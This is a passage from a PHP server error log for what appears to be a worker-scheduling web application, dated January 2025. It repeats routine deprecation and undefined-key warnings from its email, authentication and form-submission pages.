Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:02:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:02:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:02:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:03:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:03:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:04:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:04:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:04:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:05:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:05:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:11:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 22:12:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:12:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:23:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:23:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:23:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 23:38:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 23:47:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:00:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:09:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:09:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:10:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:10:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:10:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:11:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:13:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:14:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:15:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:50:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 02:12:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 02:20:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 02:53:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:10:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:13:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:13:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:44:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 04:31:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 04:56:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 05:21:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 05:25:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 05:30:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 05:31:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [17-Jan-2025 07:12:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 07:22:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 07:31:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 08:36:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 13:39:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 09:43:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 09:44:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:44:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:44:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:44:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:51:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:51:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:51:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:53:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:53:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 12:05:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 19:53:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 19:54:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:39:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 21:41:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:42:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:42:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:42:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:46:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:46:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:49:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:50:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:50:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:52:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:52:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:52:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:53:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:54:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:57:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:57:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 22:09:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 22:47:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 22:48:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:48:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:48:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:49:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:49:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:49:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:51:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 23:47:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 00:00:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 00:21:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 01:00:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [20-Jan-2025 02:17:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 02:18:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:18:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 